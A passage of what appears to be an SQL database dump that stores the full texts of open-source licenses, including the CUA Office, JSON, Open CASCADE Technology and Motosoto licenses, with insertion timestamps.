Covered Code has been published under a\nparticular version of the License, You may always continue to use it under\nthe terms of that version. You may also choose to use such Covered Code under\nthe terms of any subsequent version of the License published by CUA Office\nProject. No one other than CUA Office Project has the right to modify the\nterms applicable to Covered Code created under this License.\n\n6.3. Derivative Works. If You create or use a modified version of this License\n(which you may only do in order to apply it to code which is not already Covered\nCode governed by this License), You must (a) rename Your license so that the\nphrases \"CUA Office\", \"CUA\", \"CUAPL\", or any confusingly similar phrase do\nnot appear in your license (except to note that your license differs from\nthis License) and (b) otherwise make it clear that Your version of the license\ncontains terms which differ from the CUA Office Public License. (Filling in\nthe name of the Initial Developer, Original Code or Contributor in the notice\ndescribed in Exhibit A shall not of themselves be deemed to be modifications\nof this License.)\n\n 7. DISCLAIMER OF WARRANTY.\n\nCOVERED CODE IS PROVIDED UNDER THIS LICENSE ON AN \"AS IS\" BASIS, WITHOUT WARRANTY\nOF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, WITHOUT LIMITATION, WARRANTIES\nTHAT THE COVERED CODE IS FREE OF DEFECTS, MERCHANTABLE, FIT FOR A PARTICULAR\nPURPOSE OR NON-INFRINGING. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE\nOF THE COVERED CODE IS WITH YOU. SHOULD ANY COVERED CODE PROVE DEFECTIVE IN\nANY RESPECT, YOU (NOT THE INITIAL DEVELOPER OR ANY OTHER CONTRIBUTOR) ASSUME\nTHE COST OF ANY NECESSARY SERVICING, REPAIR OR CORRECTION. THIS DISCLAIMER\nOF WARRANTY CONSTITUTES AN ESSENTIAL PART OF THIS LICENSE. NO USE OF ANY COVERED\nCODE IS AUTHORIZED HEREUNDER EXCEPT UNDER THIS DISCLAIMER.\n\n 8. TERMINATION.\n\n8.1. This License and the rights granted hereunder will terminate automatically\nif You fail to comply with terms herein and fail to cure such breach within\n30 days of becoming aware of the breach. All sublicenses to the Covered Code\nwhich are properly granted shall survive any termination of this License.\nProvisions which, by their nature, must remain in effect beyond the termination\nof this License shall survive.\n\n8.2. If You initiate litigation by asserting a patent infringement claim (excluding\ndeclatory judgment actions) against Initial Developer or a Contributor (the\nInitial Developer or Contributor against whom You file such action is referred\nto as \"Participant\") alleging that:\n\n(a) such Participant\'s Contributor Version directly or indirectly infringes\nany patent, then any and all rights granted by such Participant to You under\nSections 2.1 and/or 2.2 of this License shall, upon 60 days notice from Participant\nterminate prospectively, unless if within 60 days after receipt of notice\nYou either: (i) agree in writing to pay Participant a mutually agreeable reasonable\nroyalty for Your past and future use of Modifications made by such Participant,\nor (ii) withdraw Your litigation claim with respect to the Contributor Version\nagainst such Participant. If within 60 days of notice, a reasonable royalty\nand payment arrangement are not mutually agreed upon in writing by the parties\nor the litigation claim is not withdrawn, the rights granted by Participant\nto You under Sections 2.1 and/or 2.2 automatically terminate at the expiration\nof the 60 day notice period specified above.\n\n(b) any software, hardware, or device, other than such Participant\'s Contributor\nVersion, directly or indirectly infringes any patent, then any rights granted\nto You by such Participant under Sections 2.1(b) and 2.2(b) are revoked effective\nas of the date You first made, used, sold, distributed, or had made, Modifications\nmade by that Participant.\n\n8.3. If You assert a patent infringement claim against Participant alleging\nthat such Participant\'s Contributor Version directly or indirectly infringes\nany patent where such claim is resolved (such as by license or settlement)\nprior to the initiation of patent infringement litigation, then the reasonable\nvalue of the licenses granted by such Participant under Sections 2.1 or 2.2\nshall be taken into account in determining the amount or value of any payment\nor license.\n\n8.4. In the event of termination under Sections 8.1 or 8.2 above, all end\nuser license agreements (excluding distributors and resellers) which have\nbeen validly granted by You or any distributor hereunder prior to termination\nshall survive termination.\n\n 9. LIMITATION OF LIABILITY.\n\nUNDER NO CIRCUMSTANCES AND UNDER NO LEGAL THEORY, WHETHER TORT (INCLUDING\nNEGLIGENCE), CONTRACT, OR OTHERWISE, SHALL YOU, THE INITIAL DEVELOPER, ANY\nOTHER CONTRIBUTOR, OR ANY DISTRIBUTOR OF COVERED CODE, OR ANY SUPPLIER OF\nANY OF SUCH PARTIES, BE LIABLE TO ANY PERSON FOR ANY INDIRECT, SPECIAL, INCIDENTAL,\nOR CONSEQUENTIAL DAMAGES OF ANY CHARACTER INCLUDING, WITHOUT LIMITATION, DAMAGES\nFOR LOSS OF GOODWILL, WORK STOPPAGE, COMPUTER FAILURE OR MALFUNCTION, OR ANY\nAND ALL OTHER COMMERCIAL DAMAGES OR LOSSES, EVEN IF SUCH PARTY SHALL HAVE\nBEEN INFORMED OF THE POSSIBILITY OF SUCH DAMAGES. THIS LIMITATION OF LIABILITY\nSHALL NOT APPLY TO LIABILITY FOR DEATH OR PERSONAL INJURY RESULTING FROM SUCH\nPARTY\'S NEGLIGENCE TO THE EXTENT APPLICABLE LAW PROHIBITS SUCH LIMITATION.\nSOME JURISDICTIONS DO NOT ALLOW THE EXCLUSION OR LIMITATION OF INCIDENTAL\nOR CONSEQUENTIAL DAMAGES, SO THIS EXCLUSION AND LIMITATION MAY NOT APPLY TO\nYOU.\n\n 10. U.S. GOVERNMENT END USERS.\n\nThe Covered Code is a \"commercial item,\" as that term is defined in 48 C.F.R.\n2.101 (Oct. 1995), consisting of \"commercial computer software\" and \"commercial\ncomputer software documentation,\" as such terms are used in 48 C.F.R. 12.212\n(Sept. 1995). Consistent with 48 C.F.R. 12.212 and 48 C.F.R. 227.7202-1 through\n227.7202-4 (June 1995), all U.S. Government End Users acquire Covered Code\nwith only those rights set forth herein.\n\n 11. MISCELLANEOUS.\n\nThis License represents the complete agreement concerning subject matter hereof.\nIf any provision of this License is held to be unenforceable, such provision\nshall be reformed only to the extent necessary to make it enforceable. This\nLicense shall be governed by California law provisions (except to the extent\napplicable law, if any, provides otherwise), excluding its conflict-of-law\nprovisions. With respect to disputes in which at least one party is a citizen\nof, or an entity chartered or registered to do business in the United States\nof America, any litigation relating to this License shall be subject to the\njurisdiction of the Federal Courts of the Northern District of California,\nwith venue lying in Santa Clara County, California, with the losing party\nresponsible for costs, including without limitation, court costs and reasonable\nattorneys\' fees and expenses. The application of the United Nations Convention\non Contracts for the International Sale of Goods is expressly excluded. Any\nlaw or regulation which provides that the language of a contract shall be\nconstrued against the drafter shall not apply to this License.\n\n 12. RESPONSIBILITY FOR CLAIMS.\n\nAs between Initial Developer and the Contributors, each party is responsible\nfor claims and damages arising, directly or indirectly, out of its utilization\nof rights under this License and You agree to work with Initial Developer\nand Contributors to distribute such responsibility on an equitable basis.\nNothing herein is intended or shall be deemed to constitute any admission\nof liability.\n\n 13. MULTIPLE-LICENSED CODE.\n\nInitial Developer may designate portions of the Covered Code as \"Multiple-Licensed\".\n\"Multiple-Licensed\" means that the Initial Developer permits you to utilize\nportions of the Covered Code under Your choice of the NPL or the alternative\nlicenses, if any, specified by the Initial Developer in the file described\nin Exhibit A. EXHIBIT A - CUA Office Public License.\n\n\" The contents of this file are subject to the CUA Office Public License Version\n1.0 (the \"License\"); you may not use this file except in compliance with the\nLicense. You may obtain a copy of the License at http://cuaoffice.sourceforge.net/\n\nSoftware distributed under the License is distributed on an \"AS IS\" basis,\nWITHOUT WARRANTY OF ANY KIND, either express or implied. See the License for\nthe specific language governing rights and limitations under the License.\n\nThe Original Code is ______________________________________ .\n\nThe Initial Developer of the Original Code is ________________________ . Portions\ncreated by ______________________ are Copyright (C) ______ _______________________\n. All Rights Reserved.\n\nContributor(s): ______________________________________ .\n\nAlternatively, the contents of this file may be used under the terms of the\n_____ license (the \" [___] License\"), in which case the provisions of [______]\nLicense are applicable instead of those above. If you wish to allow use of\nyour version of this file only under the terms of the [____] License and not\nto allow others to use your version of this file under the CUAPL, indicate\nyour decision by deleting the provisions above and replace them with the notice\nand other provisions required by the [___] License. If you do not delete the\nprovisions above, a recipient may use your version of this file under either\nthe CUAPL or the [___] License. \"\n\n[NOTE: The text of this Exhibit A may differ slightly from the text of the\nnotices in the Source Code files of the Original Code. You should use the\ntext of this Exhibit A rather than the text found in the Original Code Source\nCode for Your Modifications.]\n','2020-08-04 08:07:01','2020-08-04 08:07:01',0),(69,'JSON','JSON License\n\nCopyright (c) 2002 JSON.org\n\nPermission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \"Software\"), to deal\nin the Software without restriction, including without limitation the rights\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the Software is furnished\nto do so, subject to the following conditions:\n\nThe above copyright notice and this permission notice shall be included in\nall copies or substantial portions of the Software.\n\nThe Software shall be used for Good, not Evil.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS\nFOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS\nOR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,\nWHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF\nOR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\n','2020-08-04 08:07:01','2020-08-04 08:07:01',0),(70,'OCCT-PL','Open CASCADE Technology Public License\n\nVersion 6.6, April 2013\n\nOPEN CASCADE releases and makes publicly available the source code of the\nsoftware Open CASCADE Technology to the free software development community\nunder the terms and conditions of this license.\n\nIt is not the purpose of this license to induce you to infringe any patents\nor other property right claims or to contest validity of any such claims;\nthis license has the sole purpose of protecting the integrity of the free\nsoftware distribution system, which is implemented by public license practices.\nMany people have made generous contributions to the wide range of software\ndistributed through that system in reliance on consistent application of that\nsystem; it is up to the author/donor to decide if he or she is willing to\ndistribute software through any other system and a licensee cannot impose\nthat choice.\n\nPlease read this license carefully and completely before downloading this\nsoftware. By downloading, using, modifying, distributing and sublicensing\nthis software, you indicate your acceptance to be bound by the terms and conditions\nof this license. If you do not want to accept or cannot accept for any reasons\nthe terms and conditions of this license, please do not download or use in\nany manner this software.\n\n 1. Definitions\n\nUnless there is something in the subject matter or in the context inconsistent\ntherewith, the capitalized terms used in this License shall have the following\nmeaning.\n\n\"Applicable Intellectual Property Rights\" means (a) with respect to the Initial\nDeveloper, any rights under patents or patents applications or other intellectual\nproperty rights that are now or hereafter acquired, owned by or assigned to\nthe Initial Developer and that cover subject matter contained in the Original\nCode, but only to the extent necessary to use, reproduce, modify, distribute\nor sublicense the Original Code without infringement; and (b) with respect\nto You or any Contributor, any rights under patents or patents applications\nor other intellectual property rights that are now or hereafter acquired,\nowned by or assigned to You or to such Contributor and that cover subject\nmatter contained in Your Modifications or in such Contributor\'s Modifications,\ntaken alone or in combination with Original Code.\n\n\"Contributor\" means each individual or legal entity that creates or contributes\nto the creation of any Modification, including the Initial Developer.\n\n\"Derivative Program\": means a new program combining the Software or portions\nthereof with other source code not governed by the terms of this License.\n\n\"Initial Developer\": means OPEN CASCADE, with main offices at 1, place des\nFrères Montgolfier, 78280, Guyancourt, France.\n\n\"Modifications\": mean any addition to, deletion from or change to the substance\nor the structure of the Software. When source code of the Software is released\nas a series of files, a Modification is: (a) any addition to, deletion from\nor change to the contents of a file containing the Software or (b) any new\nfile or other representation of computer program statements that contains\nany part of the Software. By way of example, Modifications include any debug\nof, or improvement to, the Original Code or any of its components or portions\nas well as its next versions or releases thereof.\n\n\"Original Code\": means (a) the source code of the software Open CASCADE Technology\noriginally made available by the Initial Developer under this License, including\nthe source code of any updates or upgrades of the Original Code and (b) the\nobject code compiled from such source code and originally made available by\nInitial Developer under this License.\n\n\"Software\": means the Original Code, the Modifications, the combination of\nOriginal Code and any Modifications or any respective portions thereof.\n\n\"You\" or \"Your\": means an individual or a legal entity exercising rights under\nthis License\n\n 2. Acceptance of license\n\nBy using, reproducing, modifying, distributing or sublicensing the Software\nor any portion thereof, You expressly indicate Your acceptance of the terms\nand conditions of this License and undertake to act in accordance with all\nthe provisions of this License applicable to You.\n\n 3. Scope and purpose\n\nThis License applies to the Software and You may not use, reproduce, modify,\ndistribute, sublicense or circulate the Software, or any portion thereof,\nexcept as expressly provided under this License. Any attempt to otherwise\nuse, reproduce, modify, distribute or sublicense the Software is void and\nwill automatically terminate Your rights under this License.\n\n 4. Contributor license\n\nSubject to the terms and conditions of this License, the Initial Developer\nand each of the Contributors hereby grant You a world-wide, royalty-free,\nirrevocable and non-exclusive license under the Applicable Intellectual Property\nRights they own or control, to use, reproduce, modify, distribute and sublicense\nthe Software provided that:\n\nYou reproduce in all copies of the Software the copyright and other proprietary\nnotices and disclaimers of the Initial Developer as they appear in the Original\nCode and attached hereto as Schedule \"A\" and any other notices or disclaimers\nattached to the Software and keep intact all notices in the Original Code\nthat refer to this License and to the absence of any warranty;\n\nYou include a copy of this License with every copy of the Software You distribute;\n\nIf you distribute or sublicense the Software (as modified by You or on Your\nbehalf as the case may be), You cause such Software to be licensed as a whole,\nat no charge, to all third parties, under the terms and conditions of the\nLicense, making in particular available to all third parties the source code\nof the Software;\n\nYou document all Your Modifications, indicate the date of each such Modification,\ndesignate the version of the Software You used, prominently include a file\ncarrying such information with respect to the Modifications and duplicate\nthe copyright and other proprietary notices and disclaimers attached hereto\nas Schedule \"B\" or any other notices or disclaimers attached to the Software\nwith your Modifications.\n\nFor greater certainty, it is expressly understood that You may freely create\nDerivative Programs (without any obligation to publish such Derivative Program)\nand distribute same as a single product. In such case, You must ensure that\nall the requirements of this License are fulfilled for the Software or any\nportion thereof.\n\n 5. Your license\n\nYou hereby grant all Contributors and anyone who becomes a party under this\nLicense a world-wide, non-exclusive, royalty-free and irrevocable license\nunder the Applicable Intellectual Property Rights owned or controlled by You,\nto use, reproduce, modify, distribute and sublicense all Your Modifications\nunder the terms and conditions of this License.\n\n 6. Software subject to license\n\nYour Modifications shall be governed by the terms and conditions of this License.\nYou are not authorized to impose any other terms or conditions than those\nprevailing under this License when You distribute and/or sublicense the Software,\nsave and except as permitted under Section 7 hereof.\n\n 7. Additional terms\n\nYou may choose to offer, on a non-exclusive basis, and to charge a fee for\nany warranty, support, maintenance, liability obligations or other rights\nconsistent with the scope of this License with respect to the Software (the\n\"Additional Terms\") to the recipients of the Software. However, You may do\nso only on Your own behalf and on Your sole and exclusive responsibility.\nYou must obtain the recipient\'s agreement that any such Additional Terms are\noffered by You alone, and You hereby agree to indemnify, defend and hold the\nInitial Developer and any Contributor harmless for any liability incurred\nby or claims asserted against the Initial Developer or any Contributors with\nrespect to any such Additional Terms.\n\n 8. Disclaimer of warranty\n\nThe Software is provided under this License on an \"as is\" basis, without warranty\nof any kind, including without limitation, warranties that the Software is\nfree of defects, merchantable, fit for a particular purpose or non-infringing.\nThe entire risk as to the quality and performance of the Software is with\nYou.\n\n 9. Liability\n\nUnder no circumstances shall You, the Initial Developer or any Contributor\nbe liable to any person for any direct or indirect damages of any kind including,\nwithout limitation, damages for loss of goodwill, loss of data, work stoppage,\ncomputer failure or malfunction or any and all other commercial damages or\nlosses resulting from or relating to this License or indirectly to the use\nof the Software.\n\n 10. Trademark\n\nThis License does not grant any rights to use the trademarks, trade names\nand domain names \"MATRA\", \"EADS Matra Datavision\", \"CAS.CADE\", \"Open CASCADE\",\n\"opencascade.com\" and \"opencascade.org\" or any other trademarks, trade names\nor domain names used or owned by the Initial Developer.\n\n 11. Copyright\n\nThe Initial Developer retains all rights, title and interest in and to the\nOriginal Code. You may not remove the copyright © notice which appears when\nYou download the Software.\n\n 12. Term\n\nThis License is granted to You for a term equal to the remaining period of\nprotection covered by the intellectual property rights applicable to the Original\nCode.\n\n 13. Termination\n\nIn case of termination, as provided in Section 3 above, You agree to immediately\nstop any further use, reproduction, modification, distribution and sublicensing\nof the Software and to destroy all copies of the Software that are in Your\npossession or control. All sublicenses of the Software which have been properly\ngranted prior to termination shall survive any termination of this License.\nIn addition, Sections 5, 8 to 11, 13.2 and 15.2 of this License, in reason\nof their nature, shall survive the termination of this License for a period\nof fifteen (15) years.\n\n 14. Versions of the license\n\nThe Initial Developer may publish new versions of this License from time to\ntime. Once Original Code has been published under a particular version of\nthis License, You may choose to continue to use it under the terms and conditions\nof that version or use the Original Code under the terms of any subsequent\nversion of this License published by the Initial Developer.\n\n 15. Miscellaneous\n\n15.1 Relationship of the Parties This License will not be construed as creating\nan agency, partnership, joint venture or any other form of legal association\nbetween You and the Initial Developer, and You will not represent to the contrary,\nwhether expressly, by implication or otherwise.\n\n15.2 Independent Development Nothing in this License will impair the Initial\nDeveloper\'s right to acquire, license, develop, have others develop for it,\nmarket or distribute technology or products that perform the same or similar\nfunctions as, or otherwise compete with, Modifications, Derivative Programs,\ntechnology or products that You may develop, produce, market or distribute.\n\n15.3 Severability If for any reason a court of competent jurisdiction finds\nany provision of this License, or portion thereof, to be unenforceable, that\nprovision of the License will be enforced to the maximum extent permissible\nso as to effect the economic benefits and intent of the parties, and the remainder\nof this License will continue in full force and extent. END OF THE TERMS AND\nCONDITIONS OF THIS LICENSE\n\nOPEN CASCADE is a French société par actions simplifiée having its registered\nhead office at 1, place des Frères Montgolfier, 78280, Guyancourt, France\nand main offices at 1, place des Frères Montgolfier, 78280, Guyancourt, France.\nIts web site is located at the following address opencascade.com\n\nOpen CASCADE Technology Public License\n\nSchedule \"A\"\n\nThe content of this file is subject to the Open CASCADE Technology Public\nLicense (the \"License\"). You may not use the content of this file except in\ncompliance with the License. Please obtain a copy of the License at opencascade.com\nand read it completely before using this file.\n\nThe Initial Developer of the Original Code is OPEN CASCADE, with main offices\nat 1, place des Frères Montgolfier, 78280, Guyancourt, France. The Original\nCode is copyright © OPEN CASCADE SAS, 2001. All rights reserved. \"The Original\nCode and all software distributed under the License are distributed on an\n\"AS IS\" basis, without warranty of any kind, and the Initial Developer hereby\ndisclaims all such warranties, including without limitation, any warranties\nof merchantability, fitness for a particular purpose or non-infringement.\n\nPlease see the License for the specific terms and conditions governing rights\nand limitations under the License\".\n\nEnd of Schedule \"A\"\n\nOpen CASCADE Technology Public License\n\nSchedule \"B\"\n\n\"The content of this file is subject to the Open CASCADE Technology Public\nLicense (the \"License\"). You may not use the content of this file except in\ncompliance with the License. Please obtain a copy of the License at opencascade.com\nand read it completely before using this file.\n\nThe Initial Developer of the Original Code is OPEN CASCADE, with main offices\nat 1, place des Frères Montgolfier, 78280, Guyancourt, France. The Original\nCode is copyright © Open CASCADE SAS, 2001. All rights reserved.\n\nModifications to the Original Code have been made by ________________________.\nModifications are copyright © [Year to be included]. All rights reserved.\n\nThe software Open CASCADE Technology and all software distributed under the\nLicense are distributed on an \"AS IS\" basis, without warranty of any kind,\nand the Initial Developer hereby disclaims all such warranties, including\nwithout limitation, any warranties of merchantability, fitness for a particular\npurpose or non-infringement.\n\nPlease see the License for the specific terms and conditions governing rights\nand limitations under the License\"\n\nEnd of Schedule \"B\"\n','2020-08-04 08:07:01','2020-08-04 08:07:01',0),(71,'Motosoto','MOTOSOTO OPEN SOURCE LICENSE - Version 0.9.1\n\nThis Motosoto Open Source License (the \"License\") applies to \"Community Portal\nServer\" and related software products as well as any updatesor maintenance\nreleases of that software (\"Motosoto Products\") that are distributed by Motosoto.Com\nB.V. (\"Licensor\"). Any Motosoto Product licensed pursuant to this License\nis a \"Licensed Product.\" Licensed Product, in its entirety, is protected by\nDutch copyright law. This License identifies the terms under which you may\nuse, copy, distribute or modify Licensed Product and has been submitted to\nthe Open Software Initiative (OSI) for approval. Preamble\n\nThis Preamble is intended to describe, in plain English, the nature and scope\nof this License. However, this Preamble is not a part of this license. The\nlegal effect of this License is dependent only upon the terms of the License\nand not this Preamble. This License complies with the Open Source Definition\nand has been approved by Open Source Initiative. Software distributed under\nthis License may be marked as \"OSI Certified Open Source Software.\"\n\nThis License provides that:\n\n1. You may use, sell or give away the Licensed Product, alone or as a component\nof an aggregate software distribution containing programs from several different\nsources. No royalty or other fee is required.\n\n2. Both Source Code and executable versions of the Licensed Product, including\nModifications made by previous Contributors, are available for your use. (The\nterms \"Licensed Product,\" \"Modifications,\" \"Contributors\" and \"Source Code\"\nare defined in the License.)\n\n3. You are allowed to make Modifications to the Licensed Product, and you\ncan create Derivative Works from it. (The term \"Derivative Works\" is defined\nin the License.)\n\n4. By accepting the Licensed Product under the provisions of this License,\nyou agree that any Modifications you make to the Licensed Product and then\ndistribute are governed by the provisions of this License. In particular,\nyou must make the Source Code of your Modifications available to others.\n\n5. You may use the Licensed Product for any purpose, but the Licensor is not\nproviding you any warranty whatsoever, nor is the Licensor accepting any liability\nin the event that the Licensed Product doesn\'t work properly or causes you\nany injury or damages.\n\n6. If you sublicense the Licensed Product or Derivative Works, you may charge\nfees for warranty or support, or for accepting indemnity or liability obligations\nto your customers. You cannot charge for the Source Code.\n\n7. If you assert any patent claims against the Licensor relating to the Licensed\nProduct, or if you breach any terms of the License, your rights to the Licensed\nProduct under this License automatically terminate.\n\nYou may use this License to distribute your own Derivative Works, in which\ncase the provisions of this License will apply to your Derivative Works just\nas they do to the original Licensed Product.\n\nAlternatively, you may distribute your Derivative Works under any other OSI-approved\nOpen Source license, or under a proprietary license of your choice. If you\nuse any license other than this License, however, you must continue to fulfill\nthe requirements of this License (including the provisions relating to publishing\nthe Source Code) for those portions of your Derivative Works that consist\nof the Licensed Product, including the files containing Modifications.\n\nNew versions of this License may be published from time to time. You may choose\nto continue to use the license terms in this version of the License or those\nfrom the new version. However, only the Licensor has the right to change the\nLicense terms as they apply to the Licensed Product. This License relies on\nprecise definitions for certain terms. Those terms are defined when they are\nfirst used, and the definitions are repeated for your convenience in a Glossary\nat the end of the License.\n\nLicense Terms\n\n 1. Grant of License From Licensor.\n\nLicensor hereby grants you a world-wide, royalty-free, non-exclusive license,\nsubject to third party intellectual property claims, to do the following:\n\na. Use, reproduce, modify, display, perform, sublicense and distribute Licensed\nProduct or portions thereof (including Modifications as hereinafter defined),\nin both Source Code or as an executable program. \"Source Code\" means the preferred\nform for making modifications to the Licensed Product, including all modules\ncontained therein, plus any associated interface definition files, scripts\nused to control compilation and installation of an executable program, or\na list of differential comparisons against the Source Code of the Licensed\nProduct.\n\nb. Create Derivative Works (as that term is defined under Dutch copyright\nlaw) of Licensed Product by adding to or deleting from the substance or structure\nof said Licensed Product.\n\nc. Under claims of patents now or hereafter owned or controlled by Licensor,\nto make, use, sell, offer for sale, have made, and/or otherwise dispose of\nLicensed Product or portions thereof, but solely to the extent that any such\nclaim is necessary to enable you to make, use, sell, offer for sale, have\nmade, and/or otherwise dispose of Licensed Product or portions thereof or\nDerivative Works thereof.\n\n 2. Grant of License to Modifications From Contributor.\n\n\"Modifications\" means any additions to or deletions from the substance or\nstructure of (i) a file containing Licensed Product, or (ii) any new file\nthat contains any part of Licensed Product. Hereinafter in this License, the\nterm \"Licensed Product\" shall include all previous Modifications that you\nreceive from any Contributor. By application of the provisions in Section\n4(a) below, each person or entity who created or contributed to the creation\nof, and distributed, a Modification (a \"Contributor\") hereby grants you a\nworld-wide, royalty-free, non-exclusive license, subject to third party intellectual\nproperty claims, to do the following:\n\na. Use, reproduce, modify, display, perform, sublicense and distribute any\nModifications created by such Contributor or portions thereof, in both Source\nCode or as an executable program, either on an unmodified basis or as part\nof Derivative Works.\n\nb. Under claims of patents now or hereafter owned or controlled by Contributor,\nto make, use, sell, offer for sale, have made, and/or otherwise dispose of\nModifications or portions thereof, but solely to the extent that any such\nclaim is necessary to enable you to make, use, sell, offer for sale, have\nmade, and/or otherwise dispose of Modifications or portions thereof or Derivative\nWorks thereof.\n\n 3. Exclusions From License Grant.\n\nNothing in this License shall be deemed to grant any rights to trademarks,\ncopyrights, patents, trade secrets or any other intellectual property of Licensor\nor any Contributor except as expressly stated herein. No patent license is\ngranted separate from the Licensed Product, for code that you delete from\nthe Licensed Product, or for combinations of the Licensed Product with other\nsoftware or hardware. No right is granted to the trademarks of Licensor or\nany Contributor even if such marks are included in the Licensed Product. Nothing\nin this License shall be interpreted to prohibit Licensor from licensing under\ndifferent terms from this License any code that Licensor otherwise would have\na right to license.\n\n 4. Your Obligations Regarding Distribution.\n\na. Application of This License to Your Modifications. As an express condition\nfor your use of the Licensed Product, you hereby agree that any Modifications\nthat you create or to which you contribute, and which you distribute, are\ngoverned by the terms of this License including, without limitation, Section\n2. Any Modifications that you create or to which you contribute may be distributed\nonly under the terms of this License or a future version of this License released\nunder Section 7. You must include a copy of this License with every copy of\nthe Modifications you distribute. You agree not to offer or impose any terms\non any Source Code or executable version of the Licensed Product or Modifications\nthat alter or restrict the applicable version of this License or the recipients\'\nrights hereunder. However, you may include an additional document offering\nthe additional rights described in Section 4(e).\n\nb. Availability of Source Code. You must make available, under the terms of\nthis License, the Source Code of the Licensed Product and any Modifications\nthat you distribute, either on the same media as you distribute any executable\nor other form of the Licensed Product, or via a mechanism generally accepted\nin the software development community for the electronic transfer of data\n(an \"Electronic Distribution Mechanism\"). The Source Code for any version\nof Licensed Product or Modifications that you distribute must remain available\nfor at least twelve (12) months after the date it initially became available,\nor at least six (6) months after a subsequent version of said Licensed Product\nor Modifications has been made available. You are responsible for ensuring\nthat the Source Code version remains available even if the Electronic Distribution\nMechanism is maintained by a third party.\n\nc. Description of Modifications. You must cause any Modifications that you\ncreate or to which you contribute, and which you distribute, to contain a\nfile documenting the additions, changes or deletions you made to create or\ncontribute to those Modifications, and the dates of any such additions, changes\nor deletions. You must include a prominent statement that the Modifications\nare derived, directly or indirectly, from the Licensed Product and include\nthe names of the Licensor and any Contributor to the Licensed Product in (i)\nthe Source Code and (ii) in any notice displayed by a version of the Licensed\nProduct you distribute or in related documentation in which you describe the\norigin or ownership of the Licensed Product. You may not modify or delete\nany preexisting copyright notices in the Licensed Product.\n\n d. Intellectual Property Matters.\n\ni. Third Party Claims. If you have knowledge that a license to a third party\'s\nintellectual property right is required to exercise the rights granted by\nthis License, you must include a text file with the Source Code distribution\ntitled \"LEGAL\" that describes the claim and the party making the claim in\nsufficient detail that a recipient will know whom to contact. If you obtain\nsuch knowledge after you make any Modifications available as described in\nSection 4(b), you shall promptly modify the LEGAL file in all copies you make\navailable thereafter and shall take other steps (such as notifying appropriate\nmailing lists or newsgroups) reasonably calculated to inform those who received\nthe Licensed Product from you that new knowledge has been obtained.\n\nii. Contributor APIs. If your Modifications include an application programming\ninterface (\"API\") and you have knowledge of patent licenses that are reasonably\nnecessary to implement that API, you must also include this information in\nthe LEGAL file.\n\niii. Representations. You represent that, except as disclosed pursuant to\n4(d)(i) above, you believe that any Modifications you distribute are your\noriginal creations and that you have sufficient rights to grant the rights\nconveyed by this License.\n\ne. Required Notices. You must duplicate this License in any documentation\nyou provide along with the Source Code of any Modifications you create or\nto which you contribute, and which you distribute, wherever you describe recipients\'\nrights relating to Licensed Product. You must duplicate the notice contained\nin Exhibit A (the \"Notice\") in each file of the Source Code of any copy you\ndistribute of the Licensed Product. If you created a Modification, you may\nadd your name as a Contributor to the Notice. If it is not possible to put\nthe Notice in a particular Source Code file due to its structure, then you\nmust include such Notice in a location (such as a relevant directory file)\nwhere a user would be likely to look for such a notice. You may choose to\noffer, and charge a fee for, warranty, support, indemnity or liability obligations\nto one or more recipients of Licensed Product. However, you may do so only\non your own behalf, and not on behalf of the Licensor or any Contributor.\nYou must make it clear that any such warranty, support, indemnity or liability\nobligation is offered by you alone, and you hereby agree to indemnify the\nLicensor and every Contributor for any liability incurred by the Licensor\nor such Contributor as a result of warranty, support, indemnity or liability\nterms you offer.\n\nf. Distribution of Executable Versions. You may distribute Licensed Product\nas an executable program under a license of your choice that may contain terms\ndifferent from this License provided (i) you have satisfied the requirements\nof Sections 4(a) through 4(e) for that distribution, (ii) you include a conspicuous\nnotice in the executable version, related documentation and collateral materials\nstating that the Source Code version of the Licensed Product is available\nunder the terms of this License, including a description of how and where\nyou have fulfilled the obligations of Section 4(b), (iii) you retain all existing\ncopyright notices in the Licensed Product, and (iv) you make it clear that\nany terms that differ from this License are offered by you alone, not by Licensor\nor any Contributor. You hereby agree to indemnify the Licensor and every Contributor\nfor any liability incurred by Licensor or such Contributor as a result of\nany terms you offer.\n\ng. Distribution of Derivative Works. You may create Derivative Works (e.g.,\ncombinations of some or all of the Licensed Product with other code) and distribute\nthe Derivative Works as products under any other license you select, with\nthe proviso that the requirements of this License are fulfilled for those\nportions of the Derivative Works that consist of the Licensed Product or any\nModifications thereto.\n\n 5. Inability to Comply Due to Statute or Regulation.\n\nIf it is impossible for you to comply with any of the terms of this License\nwith respect to some or all of the Licensed Product due to statute, judicial\norder, or regulation, then you must (i) comply with the terms of this License\nto the maximum extent possible, (ii) cite the statute or regulation that prohibits\nyou from adhering to the License, and (iii) describe the limitations and the\ncode they affect. Such description must be included in the LEGAL file described\nin Section 4(d), and must be included with all distributions of the Source\nCode. Except to the extent prohibited by statute or regulation, such description\nmust be sufficiently detailed for a recipient of ordinary skill at computer\nprogramming to be able to understand it.\n\n 6. Application of This License.\n\nThis License applies to code to which Licensor or Contributor has attached\nthe Notice in Exhibit A, which is incorporated herein by this reference.\n\n 7. Versions of This License.\n\na. Version. The Motosoto Open Source License is derived from the Jabber Open\nSource License. All changes are related to applicable law and the location\nof court.\n\nb. New Versions. Licensor may publish from time to time revised and/or new\nversions of the License.\n\nc. Effect of New Versions. Once Licensed Product has been published under\na particular version of the License, you may always continue to use it under\nthe terms of that version. You may also choose to use such Licensed Product\nunder the terms of any subsequent version of the License published by Licensor.\nNo one other than Lic ensor has the right to modify the terms applicable to\nLicensed Product created under this License.\n\nd. Derivative Works of this License. If you create or use a modified version\nof this License, which you may do only in order to apply it to software that\nis not already a Licensed Product under this License, you must rename your\nlicense so that it is not confusingly similar to this License, and must make\nit clear that your license contains terms that differ from this License. In\nso naming your license, you may not use any trademark of Licensor or any Contributor.\n\n 8. Disclaimer of Warranty.\n\nLICENSED PRODUCT 